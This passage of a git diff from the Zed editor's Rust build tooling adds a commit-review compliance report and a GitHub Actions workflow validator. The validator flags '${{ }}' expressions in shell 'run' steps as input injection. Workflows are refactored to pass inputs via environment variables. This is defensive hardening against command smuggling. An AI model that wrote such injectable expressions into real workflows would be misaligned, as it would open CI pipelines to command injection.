writeln!(writer, "- Not reviewed: {}", summary.not_reviewed)?; + if summary.has_errors() { + writeln!(writer, "- Errors: {}", summary.errors)?; + } + writeln!(writer)?; + + write_issue_table(&mut writer, &issues, &summary)?; + write_success_table(&mut writer, &successes)?; + + writer + .flush() + .with_context(|| format!("Failed to flush markdown report to {}", path.display())) + } +} + +fn write_issue_table( + writer: &mut impl Write, + issues: &[ReportEntry], + summary: &ReportSummary, +) -> std::io::Result<()> { + if summary.has_errors() { + writeln!(writer, "## Errors and unreviewed commits")?; + } else { + writeln!(writer, "## Unreviewed commits")?; + } + writeln!(writer)?; + + if issues.is_empty() { + if summary.has_errors() { + writeln!(writer, "No errors or unreviewed commits found.")?; + } else { + writeln!(writer, "No unreviewed commits found.")?; + } + writeln!(writer)?; + return Ok(()); + } + + writeln!(writer, "| Commit | PR | Author | Outcome | Reason |")?; + writeln!(writer, "| --- | --- | --- | --- | --- |")?; + + for entry in issues { + let issue_kind = entry.issue_kind(); + writeln!( + writer, + "| {} | {} | {} | {} | {} |", + entry.commit_cell(), + entry.pull_request_cell(), + entry.author_cell(), + issue_kind, + entry.reason_cell(), + )?; + } + + writeln!(writer)?; + Ok(()) +} + +fn write_success_table( + writer: &mut impl Write, + successful_entries: &[ReportEntry], +) -> std::io::Result<()> { + writeln!(writer, "## Successful commits")?; + writeln!(writer)?; + + if successful_entries.is_empty() { + writeln!(writer, "No successful commits found.")?; + writeln!(writer)?; + return Ok(()); + } + + writeln!(writer, "| Commit | PR | Author | Reviewers | Reason |")?; + writeln!(writer, "| --- | --- | --- | --- | --- |")?; + + for entry in successful_entries { + writeln!( + writer, + "| {} | {} | {} | {} | {} |", + entry.commit_cell(), + entry.pull_request_cell(), + entry.author_cell(), + entry.reviewers_cell(), + entry.reason_cell(), + )?; + } + + 
writeln!(writer)?; + Ok(()) +} + +fn escape_markdown_link_text(input: &str) -> String { + escape_markdown_table_text(input) + .replace('[', r"\[") + .replace(']', r"\]") +} + +fn escape_markdown_table_text(input: &str) -> String { + input + .replace('\\', r"\\") + .replace('|', r"\|") + .replace('\r', "") + .replace('\n', "
") +} + +#[cfg(test)] +mod tests { + use std::str::FromStr; + + use crate::{ + checks::{ReviewFailure, ReviewSuccess}, + git::{CommitDetails, CommitList}, + github::{GitHubUser, PullRequestReview, ReviewState}, + }; + + use super::{Report, ReportReviewSummary}; + + fn make_commit( + sha: &str, + author_name: &str, + author_email: &str, + title: &str, + body: &str, + ) -> CommitDetails { + let formatted = format!( + "{sha}|field-delimiter|{author_name}|field-delimiter|{author_email}|field-delimiter|{title}|body-delimiter|{body}|commit-delimiter|" + ); + CommitList::from_str(&formatted) + .expect("test commit should parse") + .into_iter() + .next() + .expect("should have one commit") + } + + fn reviewed() -> ReviewSuccess { + ReviewSuccess::PullRequestReviewed(vec![PullRequestReview { + user: Some(GitHubUser { + login: "reviewer".to_owned(), + }), + state: Some(ReviewState::Approved), + }]) + } + + #[test] + fn report_summary_counts_are_accurate() { + let mut report = Report::new(); + + report.add( + make_commit( + "aaa", + "Alice", + "alice@test.com", + "Reviewed commit (#100)", + "", + ), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Unreviewed commit (#200)", ""), + Err(ReviewFailure::Unreviewed), + ); + report.add( + make_commit("ccc", "Carol", "carol@test.com", "No PR commit", ""), + Err(ReviewFailure::NoPullRequestFound), + ); + report.add( + make_commit("ddd", "Dave", "dave@test.com", "Error commit (#300)", ""), + Err(ReviewFailure::Other(anyhow::anyhow!("some error"))), + ); + + let summary = report.summary(); + assert_eq!(summary.pull_requests, 3); + assert_eq!(summary.reviewed, 1); + assert_eq!(summary.not_reviewed, 2); + assert_eq!(summary.errors, 1); + } + + #[test] + fn report_summary_all_reviewed_is_no_issues() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "First (#100)", ""), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Second 
(#200)", ""), + Ok(reviewed()), + ); + + let summary = report.summary(); + assert!(matches!( + summary.review_summary(), + ReportReviewSummary::NoIssuesFound + )); + } + + #[test] + fn report_summary_missing_reviews_only() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "Reviewed (#100)", ""), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Unreviewed (#200)", ""), + Err(ReviewFailure::Unreviewed), + ); + + let summary = report.summary(); + assert!(matches!( + summary.review_summary(), + ReportReviewSummary::MissingReviews + )); + } + + #[test] + fn report_summary_errors_and_missing_reviews() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "Unreviewed (#100)", ""), + Err(ReviewFailure::Unreviewed), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Errored (#200)", ""), + Err(ReviewFailure::Other(anyhow::anyhow!("check failed"))), + ); + + let summary = report.summary(); + assert!(matches!( + summary.review_summary(), + ReportReviewSummary::MissingReviewsWithErrors + )); + } + + #[test] + fn report_summary_deduplicates_pull_requests() { + let mut report = Report::new(); + + report.add( + make_commit("aaa", "Alice", "alice@test.com", "First change (#100)", ""), + Ok(reviewed()), + ); + report.add( + make_commit("bbb", "Bob", "bob@test.com", "Second change (#100)", ""), + Ok(reviewed()), + ); + + let summary = report.summary(); + assert_eq!(summary.pull_requests, 1); + } +} diff --git a/tooling/xtask/Cargo.toml b/tooling/xtask/Cargo.toml index 13179b2eb69ba9a63ba6be5784907b78bba1b9f2..f9628dfa6390872210df9f3cc00b367d9420f522 100644 --- a/tooling/xtask/Cargo.toml +++ b/tooling/xtask/Cargo.toml @@ -9,15 +9,22 @@ license = "GPL-3.0-or-later" workspace = true [dependencies] +annotate-snippets = "0.12.1" anyhow.workspace = true backtrace.workspace = true cargo_metadata.workspace = true cargo_toml.workspace = true clap = { 
workspace = true, features = ["derive"] } -toml.workspace = true +compliance = { workspace = true, features = ["octo-client"] } +gh-workflow.workspace = true indoc.workspace = true indexmap.workspace = true +itertools.workspace = true +regex.workspace = true serde.workspace = true serde_json.workspace = true +serde_yaml = "0.9.34" +strum.workspace = true +tokio = { workspace = true, features = ["rt", "rt-multi-thread"] } +toml.workspace = true toml_edit.workspace = true -gh-workflow.workspace = true diff --git a/tooling/xtask/src/main.rs b/tooling/xtask/src/main.rs index 8246b98772184276ecabc685a9b4d2e7c5346edf..c442f1c509e28172b7283c95e518eee743b7730c 100644 --- a/tooling/xtask/src/main.rs +++ b/tooling/xtask/src/main.rs @@ -15,6 +15,7 @@ struct Args { enum CliCommand { /// Runs `cargo clippy`. Clippy(tasks::clippy::ClippyArgs), + Compliance(tasks::compliance::ComplianceArgs), Licenses(tasks::licenses::LicensesArgs), /// Checks that packages conform to a set of standards. PackageConformity(tasks::package_conformity::PackageConformityArgs), @@ -23,6 +24,7 @@ enum CliCommand { /// Builds GPUI web examples and serves them. 
WebExamples(tasks::web_examples::WebExamplesArgs), Workflows(tasks::workflows::GenerateWorkflowArgs), + CheckWorkflows(tasks::workflow_checks::WorkflowValidationArgs), } fn main() -> Result<()> { @@ -30,6 +32,7 @@ fn main() -> Result<()> { match args.command { CliCommand::Clippy(args) => tasks::clippy::run_clippy(args), + CliCommand::Compliance(args) => tasks::compliance::check_compliance(args), CliCommand::Licenses(args) => tasks::licenses::run_licenses(args), CliCommand::PackageConformity(args) => { tasks::package_conformity::run_package_conformity(args) @@ -37,5 +40,6 @@ fn main() -> Result<()> { CliCommand::PublishGpui(args) => tasks::publish_gpui::run_publish_gpui(args), CliCommand::WebExamples(args) => tasks::web_examples::run_web_examples(args), CliCommand::Workflows(args) => tasks::workflows::run_workflows(args), + CliCommand::CheckWorkflows(args) => tasks::workflow_checks::validate(args), } } diff --git a/tooling/xtask/src/tasks.rs b/tooling/xtask/src/tasks.rs index 4701b56d8dd201ad5b5f28764976b0c5397f3a3e..ea67d0abc5fcbd8e85f40251a7997bc6fbbbca1f 100644 --- a/tooling/xtask/src/tasks.rs +++ b/tooling/xtask/src/tasks.rs @@ -1,6 +1,8 @@ pub mod clippy; +pub mod compliance; pub mod licenses; pub mod package_conformity; pub mod publish_gpui; pub mod web_examples; +pub mod workflow_checks; pub mod workflows; diff --git a/tooling/xtask/src/tasks/compliance.rs b/tooling/xtask/src/tasks/compliance.rs new file mode 100644 index 0000000000000000000000000000000000000000..78cc32b23f3160ae950aaa5e374071dd107ec350 --- /dev/null +++ b/tooling/xtask/src/tasks/compliance.rs @@ -0,0 +1,135 @@ +use std::path::PathBuf; + +use anyhow::{Context, Result}; +use clap::Parser; + +use compliance::{ + checks::Reporter, + git::{CommitsFromVersionToHead, GetVersionTags, GitCommand, VersionTag}, + github::GitHubClient, + report::ReportReviewSummary, +}; + +#[derive(Parser)] +pub struct ComplianceArgs { + #[arg(value_parser = VersionTag::parse)] + // The version to be on the lookout for 
+ pub(crate) version_tag: VersionTag, + #[arg(long)] + // The markdown file to write the compliance report to + report_path: PathBuf, + #[arg(long)] + // An optional branch to use instead of the determined version branch + branch: Option, +} + +impl ComplianceArgs { + pub(crate) fn version_tag(&self) -> &VersionTag { + &self.version_tag + } + + fn version_branch(&self) -> String { + self.branch.clone().unwrap_or_else(|| { + format!( + "v{major}.{minor}.x", + major = self.version_tag().version().major, + minor = self.version_tag().version().minor + ) + }) + } +} + +async fn check_compliance_impl(args: ComplianceArgs) -> Result<()> { + let app_id = std::env::var("GITHUB_APP_ID").context("Missing GITHUB_APP_ID")?; + let key = std::env::var("GITHUB_APP_KEY").context("Missing GITHUB_APP_KEY")?; + + let tag = args.version_tag(); + + let previous_version = GitCommand::run(GetVersionTags)? + .sorted() + .find_previous_minor_version(&tag) + .cloned() + .ok_or_else(|| { + anyhow::anyhow!( + "Could not find previous version for tag {tag}", + tag = tag.to_string() + ) + })?; + + println!( + "Checking compliance for version {} with version {} as base", + tag.version(), + previous_version.version() + ); + + let commits = GitCommand::run(CommitsFromVersionToHead::new( + previous_version, + args.version_branch(), + ))?; + + let Some(range) = commits.range() else { + anyhow::bail!("No commits found to check"); + }; + + println!("Checking commit range {range}, {} total", commits.len()); + + let client = GitHubClient::for_app( + app_id.parse().context("Failed to parse app ID as int")?, + key.as_ref(), + ) + .await?; + + println!("Initialized GitHub client for app ID {app_id}"); + + let report = Reporter::new(commits, &client).generate_report().await?; + + println!( + "Generated report for version {}", + args.version_tag().to_string() + ); + + let summary = report.summary(); + + println!( + "Applying compliance labels to {} pull requests", + summary.pull_requests + ); + + for report 
in report.errors() { + if let Some(pr_number) = report.commit.pr_number() { + println!("Adding review label to PR {}...", pr_number); + + client + .add_label_to_pull_request(compliance::github::PR_REVIEW_LABEL, pr_number) + .await?; + } + } + + let report_path = args.report_path.with_extension("md"); + + report.write_markdown(&report_path)?; + + println!("Wrote compliance report to {}", report_path.display()); + + match summary.review_summary() { + ReportReviewSummary::MissingReviews => Err(anyhow::anyhow!( + "Compliance check failed, found {} commits not reviewed", + summary.not_reviewed + )), + ReportReviewSummary::MissingReviewsWithErrors => Err(anyhow::anyhow!( + "Compliance check failed with {} unreviewed commits and {} other issues", + summary.not_reviewed, + summary.errors + )), + ReportReviewSummary::NoIssuesFound => { + println!("No issues found, compliance check passed."); + Ok(()) + } + } +} + +pub fn check_compliance(args: ComplianceArgs) -> Result<()> { + tokio::runtime::Runtime::new() + .context("Failed to create tokio runtime") + .and_then(|handle| handle.block_on(check_compliance_impl(args))) +} diff --git a/tooling/xtask/src/tasks/web_examples.rs b/tooling/xtask/src/tasks/web_examples.rs index 93179c92ca9a021838d48ae6a976f3c2a434f6a2..5b8e0fdd610e39a8ee020eddfbc9b98d00bdf419 100644 --- a/tooling/xtask/src/tasks/web_examples.rs +++ b/tooling/xtask/src/tasks/web_examples.rs @@ -71,6 +71,8 @@ pub fn run_web_examples(args: WebExamplesArgs) -> Result<()> { "gpui", "--keep-going", ]); + // 🙈 + cmd.env("RUSTC_BOOTSTRAP", "1"); for name in &examples { cmd.args(["--example", name]); } @@ -109,6 +111,8 @@ pub fn run_web_examples(args: WebExamplesArgs) -> Result<()> { "--out-name", name, ]) + // 🙈 + .env("RUSTC_BOOTSTRAP", "1") .status() .context("failed to run wasm-bindgen")?; if !status.success() { diff --git a/tooling/xtask/src/tasks/workflow_checks.rs b/tooling/xtask/src/tasks/workflow_checks.rs new file mode 100644 index 
0000000000000000000000000000000000000000..d6be0299327ad2dd4b4a126a61a8b2ae6ddb9fd3 --- /dev/null +++ b/tooling/xtask/src/tasks/workflow_checks.rs @@ -0,0 +1,118 @@ +mod check_run_patterns; + +use std::{fs, path::PathBuf}; + +use annotate_snippets::Renderer; +use anyhow::{Result, anyhow}; +use clap::Parser; +use itertools::{Either, Itertools}; +use serde_yaml::Value; +use strum::IntoEnumIterator; + +use crate::tasks::{ + workflow_checks::check_run_patterns::{ + RunValidationError, WorkflowFile, WorkflowValidationError, + }, + workflows::WorkflowType, +}; + +pub use check_run_patterns::validate_run_command; + +#[derive(Default, Parser)] +pub struct WorkflowValidationArgs {} + +pub fn validate(_: WorkflowValidationArgs) -> Result<()> { + let (parsing_errors, file_errors): (Vec<_>, Vec<_>) = get_all_workflow_files() + .map(check_workflow) + .flat_map(Result::err) + .partition_map(|error| match error { + WorkflowError::ParseError(error) => Either::Left(error), + WorkflowError::ValidationError(error) => Either::Right(error), + }); + + if !parsing_errors.is_empty() { + Err(anyhow!( + "Failed to read or parse some workflow files: {}", + parsing_errors.into_iter().join("\n") + )) + } else if !file_errors.is_empty() { + let errors: Vec<_> = file_errors + .iter() + .map(|error| error.annotation_group()) + .collect(); + + let renderer = + Renderer::styled().decor_style(annotate_snippets::renderer::DecorStyle::Ascii); + println!("{}", renderer.render(errors.as_slice())); + + Err(anyhow!("Workflow checks failed!")) + } else { + Ok(()) + } +} + +enum WorkflowError { + ParseError(anyhow::Error), + ValidationError(Box), +} + +fn get_all_workflow_files() -> impl Iterator { + WorkflowType::iter() + .map(|workflow_type| workflow_type.folder_path()) + .flat_map(|folder_path| { + fs::read_dir(folder_path).into_iter().flat_map(|entries| { + entries + .flat_map(Result::ok) + .map(|entry| entry.path()) + .filter(|path| { + path.extension() + .is_some_and(|ext| ext == "yaml" || ext == 
"yml") + }) + }) + }) +} + +fn check_workflow(workflow_file_path: PathBuf) -> Result<(), WorkflowError> { + fn collect_errors( + iter: impl Iterator>>, + ) -> Result<(), Vec> { + Some(iter.flat_map(Result::err).flatten().collect::>()) + .filter(|errors| !errors.is_empty()) + .map_or(Ok(()), Err) + } + + fn check_recursive(key: &Value, value: &Value) -> Result<(), Vec> { + match value { + Value::Mapping(mapping) => collect_errors( + mapping + .into_iter() + .map(|(key, value)| check_recursive(key, value)), + ), + Value::Sequence(sequence) => collect_errors( + sequence + .into_iter() + .map(|value| check_recursive(key, value)), + ), + Value::String(string) => check_string(key, string).map_err(|error| vec![error]), + Value::Null | Value::Bool(_) | Value::Number(_) | Value::Tagged(_) => Ok(()), + } + } + + let file_content = + WorkflowFile::load(&workflow_file_path).map_err(WorkflowError::ParseError)?; + + check_recursive(&Value::Null, &file_content.parsed_content).map_err(|errors| { + WorkflowError::ValidationError(Box::new(WorkflowValidationError::new( + errors, + file_content, + workflow_file_path, + ))) + }) +} + +fn check_string(key: &Value, value: &str) -> Result<(), RunValidationError> { + match key { + Value::String(key) if key == "run" => validate_run_command(value), + _ => Ok(()), + } +} diff --git a/tooling/xtask/src/tasks/workflow_checks/check_run_patterns.rs b/tooling/xtask/src/tasks/workflow_checks/check_run_patterns.rs new file mode 100644 index 0000000000000000000000000000000000000000..50c435d033336dd82d2f110f5c880dff0d677e52 --- /dev/null +++ b/tooling/xtask/src/tasks/workflow_checks/check_run_patterns.rs @@ -0,0 +1,124 @@ +use annotate_snippets::{AnnotationKind, Group, Level, Snippet}; +use anyhow::{Result, anyhow}; +use regex::Regex; +use serde_yaml::Value; +use std::{ + collections::HashMap, + fs, + ops::Range, + path::{Path, PathBuf}, + sync::LazyLock, +}; + +static GITHUB_INPUT_PATTERN: LazyLock = LazyLock::new(|| { + 
Regex::new(r#"\$\{\{[[:blank:]]*([[:alnum:]]|[[:punct:]])+?[[:blank:]]*\}\}"#) + .expect("Should compile") +}); + +pub struct WorkflowFile { + raw_content: String, + pub parsed_content: Value, +} + +impl WorkflowFile { + pub fn load(workflow_file_path: &Path) -> Result { + fs::read_to_string(workflow_file_path) + .map_err(|_| { + anyhow!( + "Could not read workflow file at {}", + workflow_file_path.display() + ) + }) + .and_then(|file_content| { + serde_yaml::from_str(&file_content) + .map(|parsed_content| Self { + raw_content: file_content, + parsed_content, + }) + .map_err(|e| anyhow!("Failed to parse workflow file: {e:?}")) + }) + } +} + +pub struct WorkflowValidationError { + file_path: PathBuf, + contents: WorkflowFile, + errors: Vec, +} + +impl WorkflowValidationError { + pub fn new( + errors: Vec, + contents: WorkflowFile, + file_path: PathBuf, + ) -> Self { + Self { + file_path, + contents, + errors, + } + } + + pub fn annotation_group<'a>(&'a self) -> Group<'a> { + let raw_content = &self.contents.raw_content; + let mut identical_lines = HashMap::new(); + + let ranges = self + .errors + .iter() + .flat_map(|error| error.found_injection_patterns.iter()) + .map(|(line, pattern_range)| { + let initial_offset = identical_lines + .get(&(line.as_str(), pattern_range.start)) + .copied() + .unwrap_or_default(); + + let line_start = raw_content[initial_offset..] 
+ .find(line.as_str()) + .map(|offset| offset + initial_offset) + .unwrap_or_default(); + + let pattern_start = line_start + pattern_range.start; + let pattern_end = pattern_start + pattern_range.len(); + + identical_lines.insert((line.as_str(), pattern_range.start), pattern_end); + + pattern_start..pattern_end + }); + + Level::ERROR + .primary_title("Found GitHub input injection in run command") + .element( + Snippet::source(&self.contents.raw_content) + .path(self.file_path.display().to_string()) + .annotations(ranges.map(|range| { + AnnotationKind::Primary + .span(range) + .label("This should be passed via an environment variable") + })), + ) + } +} + +pub struct RunValidationError { + found_injection_patterns: Vec<(String, Range)>, +} + +pub fn validate_run_command(command: &str) -> Result<(), RunValidationError> { + let patterns: Vec<_> = command + .lines() + .flat_map(move |line| { + GITHUB_INPUT_PATTERN + .find_iter(line) + .map(|m| (line.to_owned(), m.range())) + }) + .collect(); + + if patterns.is_empty() { + Ok(()) + } else { + Err(RunValidationError { + found_injection_patterns: patterns, + }) + } +} diff --git a/tooling/xtask/src/tasks/workflows.rs b/tooling/xtask/src/tasks/workflows.rs index 5663ebec247c4025f7cfbae8e9467733e2c7be2d..387c739a1ac12d4d65d11f33777525c59f05f7f2 100644 --- a/tooling/xtask/src/tasks/workflows.rs +++ b/tooling/xtask/src/tasks/workflows.rs @@ -4,13 +4,17 @@ use gh_workflow::Workflow; use std::fs; use std::path::{Path, PathBuf}; +use crate::tasks::workflow_checks::{self}; + mod after_release; mod autofix_pr; mod bump_patch_version; mod cherry_pick; mod compare_perf; +mod compliance_check; mod danger; mod deploy_collab; +mod extension_auto_bump; mod extension_bump; mod extension_tests; mod extension_workflow_rollout; @@ -27,38 +31,99 @@ mod runners; mod steps; mod vars; +#[derive(Clone)] +pub(crate) struct GitSha(String); + +impl AsRef for GitSha { + fn as_ref(&self) -> &str { + &self.0 + } +} + +#[allow( + 
clippy::disallowed_methods, + reason = "This runs only in a CLI environment" +)] +fn parse_ref(value: &str) -> Result { + const GIT_SHA_LENGTH: usize = 40; + (value.len() == GIT_SHA_LENGTH) + .then_some(value) + .ok_or_else(|| { + format!( + "Git SHA has wrong length! \ + Only SHAs with a full length of {GIT_SHA_LENGTH} are supported, found {len} characters.", + len = value.len() + ) + }) + .and_then(|value| { + let mut tmp = [0; 4]; + value + .chars() + .all(|char| u16::from_str_radix(char.encode_utf8(&mut tmp), 16).is_ok()).then_some(value) + .ok_or_else(|| "Not a valid Git SHA".to_owned()) + }) + .and_then(|sha| { + std::process::Command::new("git") + .args([ + "rev-parse", + "--quiet", + "--verify", + &format!("{sha}^{{commit}}") + ]) + .output() + .map_err(|_| "Failed to spawn Git command to verify SHA".to_owned()) + .and_then(|output| + output + .status.success() + .then_some(sha) + .ok_or_else(|| format!("SHA {sha} is not a valid Git SHA within this repository!"))) + }).map(|sha| GitSha(sha.to_owned())) +} + #[derive(Parser)] -pub struct GenerateWorkflowArgs {} +pub(crate) struct GenerateWorkflowArgs { + #[arg(value_parser = parse_ref)] + /// The Git SHA to use when invoking this + pub(crate) sha: Option, +} + +enum WorkflowSource { + Contextless(fn() -> Workflow), + WithContext(fn(&GenerateWorkflowArgs) -> Workflow), +} struct WorkflowFile { - source: fn() -> Workflow, + source: WorkflowSource, r#type: WorkflowType, } impl WorkflowFile { fn zed(f: fn() -> Workflow) -> WorkflowFile { WorkflowFile { - source: f, + source: WorkflowSource::Contextless(f), r#type: WorkflowType::Zed, } } - fn extension(f: fn() -> Workflow) -> WorkflowFile { + fn extension(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile { WorkflowFile { - source: f, + source: WorkflowSource::WithContext(f), r#type: WorkflowType::ExtensionCi, } } - fn extension_shared(f: fn() -> Workflow) -> WorkflowFile { + fn extension_shared(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile { 
WorkflowFile { - source: f, + source: WorkflowSource::WithContext(f), r#type: WorkflowType::ExtensionsShared, } } - fn generate_file(&self) -> Result<()> { - let workflow = (self.source)(); + fn generate_file(&self, workflow_args: &GenerateWorkflowArgs) -> Result<()> { + let workflow = match &self.source { + WorkflowSource::Contextless(f) => f(), + WorkflowSource::WithContext(f) => f(workflow_args), + }; let workflow_folder = self.r#type.folder_path(); fs::create_dir_all(&workflow_folder).with_context(|| { @@ -87,8 +152,8 @@ impl WorkflowFile { } } -#[derive(PartialEq, Eq)] -enum WorkflowType { +#[derive(PartialEq, Eq, strum::EnumIter)] +pub enum WorkflowType { /// Workflows living in the Zed repository Zed, /// Workflows living in the `zed-extensions/workflows` repository that are @@ -113,7 +178,7 @@ impl WorkflowType { ) } - fn folder_path(&self) -> PathBuf { + pub fn folder_path(&self) -> PathBuf { match self { WorkflowType::Zed => PathBuf::from(".github/workflows"), WorkflowType::ExtensionCi => PathBuf::from("extensions/workflows"), @@ -122,7 +187,7 @@ impl WorkflowType { } } -pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> { +pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> { if !Path::new("crates/zed/").is_dir() { anyhow::bail!("xtask workflows must be ran from the project root"); } @@ -133,15 +198,16 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> { WorkflowFile::zed(bump_patch_version::bump_patch_version), WorkflowFile::zed(cherry_pick::cherry_pick), WorkflowFile::zed(compare_perf::compare_perf), + WorkflowFile::zed(compliance_check::compliance_check), WorkflowFile::zed(danger::danger), WorkflowFile::zed(deploy_collab::deploy_collab), WorkflowFile::zed(extension_bump::extension_bump), + WorkflowFile::zed(extension_auto_bump::extension_auto_bump), WorkflowFile::zed(extension_tests::extension_tests), WorkflowFile::zed(extension_workflow_rollout::extension_workflow_rollout), 
WorkflowFile::zed(publish_extension_cli::publish_extension_cli), WorkflowFile::zed(release::release), WorkflowFile::zed(release_nightly::release_nightly), - WorkflowFile::zed(run_agent_evals::run_agent_evals), WorkflowFile::zed(run_agent_evals::run_cron_unit_evals), WorkflowFile::zed(run_agent_evals::run_unit_evals), WorkflowFile::zed(run_bundling::run_bundling), @@ -152,8 +218,8 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> { ]; for workflow_file in workflows { - workflow_file.generate_file()?; + workflow_file.generate_file(&args)?; } - Ok(()) + workflow_checks::validate(Default::default()) } diff --git a/tooling/xtask/src/tasks/workflows/after_release.rs b/tooling/xtask/src/tasks/workflows/after_release.rs index 3936e3ffb7754d167c6c39f02e17f758bed0c1ae..07ff1fba0d4799c463128362ad4ba996ccf8cea0 100644 --- a/tooling/xtask/src/tasks/workflows/after_release.rs +++ b/tooling/xtask/src/tasks/workflows/after_release.rs @@ -123,7 +123,7 @@ fn publish_winget() -> NamedJob { "X-GitHub-Api-Version" = "2022-11-28" } $body = @{ branch = "master" } | ConvertTo-Json - $uri = "https://api.github.com/repos/${{ github.repository_owner }}/winget-pkgs/merge-upstream" + $uri = "https://api.github.com/repos/$env:GITHUB_REPOSITORY_OWNER/winget-pkgs/merge-upstream" try { Invoke-RestMethod -Uri $uri -Method Post -Headers $headers -Body $body -ContentType "application/json" Write-Host "Successfully synced winget-pkgs fork" diff --git a/tooling/xtask/src/tasks/workflows/autofix_pr.rs b/tooling/xtask/src/tasks/workflows/autofix_pr.rs index c2c89b7cd05394c225c015a6cc83f48bd35b24a4..6fa7743275f36eda1746e7afdd4caabc429fec3c 100644 --- a/tooling/xtask/src/tasks/workflows/autofix_pr.rs +++ b/tooling/xtask/src/tasks/workflows/autofix_pr.rs @@ -2,7 +2,7 @@ use gh_workflow::*; use crate::tasks::workflows::{ runners, - steps::{self, FluentBuilder, NamedJob, named}, + steps::{self, FluentBuilder, NamedJob, RepositoryTarget, TokenPermissions, named}, vars::{self, StepOutput, 
WorkflowInput}, }; @@ -55,7 +55,8 @@ fn download_patch_artifact() -> Step { fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJob { fn checkout_pr(pr_number: &WorkflowInput) -> Step { - named::bash(&format!("gh pr checkout {pr_number}")) + named::bash(r#"gh pr checkout "$PR_NUMBER""#) + .add_env(("PR_NUMBER", pr_number.to_string())) .add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN)) } @@ -133,7 +134,9 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo fn commit_changes(pr_number: &WorkflowInput, autofix_job: &NamedJob) -> NamedJob { fn checkout_pr(pr_number: &WorkflowInput, token: &StepOutput) -> Step { - named::bash(&format!("gh pr checkout {pr_number}")).add_env(("GITHUB_TOKEN", token)) + named::bash(r#"gh pr checkout "$PR_NUMBER""#) + .add_env(("PR_NUMBER", pr_number.to_string())) + .add_env(("GITHUB_TOKEN", token)) } fn apply_patch() -> Step { @@ -158,7 +161,13 @@ fn commit_changes(pr_number: &WorkflowInput, autofix_job: &NamedJob) -> NamedJob .add_env(("GITHUB_TOKEN", token)) } - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy() + .for_repository(RepositoryTarget::current()) + .with_permissions([ + (TokenPermissions::Contents, Level::Write), + (TokenPermissions::Workflows, Level::Write), + ]) + .into(); named::job( Job::default() diff --git a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs index 5ef149be29313bc2078dbc1f75a82845c3d3b666..7db348c1d5980c1b21780d9fe0af4e326f6283ca 100644 --- a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs +++ b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs @@ -63,7 +63,7 @@ fn run_bump_patch_version(branch: &WorkflowInput) -> steps::NamedJob { .add_env(("GITHUB_TOKEN", token)) } - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy().into(); named::job( 
Job::default() diff --git a/tooling/xtask/src/tasks/workflows/cherry_pick.rs b/tooling/xtask/src/tasks/workflows/cherry_pick.rs index eaa786837f84ebf4d4f7e1a579db0c7b4dcc5040..46fb41094eb9fcea3cf40c4a289217f16855483b 100644 --- a/tooling/xtask/src/tasks/workflows/cherry_pick.rs +++ b/tooling/xtask/src/tasks/workflows/cherry_pick.rs @@ -2,7 +2,7 @@ use gh_workflow::*; use crate::tasks::workflows::{ runners, - steps::{self, NamedJob, named}, + steps::{self, NamedJob, RepositoryTarget, TokenPermissions, named}, vars::{StepOutput, WorkflowInput}, }; @@ -35,13 +35,23 @@ fn run_cherry_pick( channel: &WorkflowInput, token: &StepOutput, ) -> Step { - named::bash(&format!("./script/cherry-pick {branch} {commit} {channel}")) + named::bash(r#"./script/cherry-pick "$BRANCH" "$COMMIT" "$CHANNEL""#) + .add_env(("BRANCH", branch.to_string())) + .add_env(("COMMIT", commit.to_string())) + .add_env(("CHANNEL", channel.to_string())) .add_env(("GIT_COMMITTER_NAME", "Zed Zippy")) .add_env(("GIT_COMMITTER_EMAIL", "hi@zed.dev")) .add_env(("GITHUB_TOKEN", token)) } - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy() + .for_repository(RepositoryTarget::current()) + .with_permissions([ + (TokenPermissions::Contents, Level::Write), + (TokenPermissions::Workflows, Level::Write), + (TokenPermissions::PullRequests, Level::Write), + ]) + .into(); named::job( Job::default() diff --git a/tooling/xtask/src/tasks/workflows/compare_perf.rs b/tooling/xtask/src/tasks/workflows/compare_perf.rs index 1d111acc4f8a4dc47edea6f45c0b93c845b7cda2..39f17b8d148bd6022913fdf5097368690cbd0fd0 100644 --- a/tooling/xtask/src/tasks/workflows/compare_perf.rs +++ b/tooling/xtask/src/tasks/workflows/compare_perf.rs @@ -29,24 +29,30 @@ pub fn run_perf( crate_name: &WorkflowInput, ) -> NamedJob { fn cargo_perf_test(ref_name: &WorkflowInput, crate_name: &WorkflowInput) -> Step { - named::bash(&format!( - " - if [ -n \"{crate_name}\" ]; then - cargo 
